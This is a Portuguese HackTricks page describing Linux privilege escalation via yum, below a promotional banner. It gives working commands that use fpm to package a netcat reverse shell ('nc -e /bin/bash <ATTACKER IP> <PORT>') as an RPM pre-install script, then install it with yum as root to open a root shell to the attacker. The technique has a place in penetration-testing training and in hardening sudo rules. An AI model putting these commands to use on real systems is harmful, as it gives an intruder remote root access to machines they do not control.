3.2 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Mais exemplos sobre yum também podem ser encontrados em gtfobins.
Executando comandos arbitrários via Pacotes RPM
Verificando o Ambiente
Para aproveitar esse vetor, o usuário deve ser capaz de executar comandos yum como um usuário com privilégios mais elevados, ou seja, root.
Um exemplo de trabalho desse vetor
Um exemplo de trabalho desse exploit pode ser encontrado na sala daily bugle em tryhackme.
Empacotando um RPM
Na seção a seguir, abordarei o empacotamento de um shell reverso em um RPM usando fpm.
O exemplo abaixo cria um pacote que inclui um gatilho antes da instalação com um script arbitrário que pode ser definido pelo atacante. Quando instalado, este pacote executará o comando arbitrário. Eu usei um exemplo simples de shell reverso do netcat para demonstração, mas isso pode ser alterado conforme necessário.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Capturando um shell
Usando o exemplo acima e assumindo que yum
pode ser executado como um usuário com privilégios mais altos.
- Transferir o rpm para o host
- Iniciar um listener em seu host local, como o exemplo de listener netcat
- Instalar o pacote vulnerável
yum localinstall -y exploited-1.0-1.noarch.rpm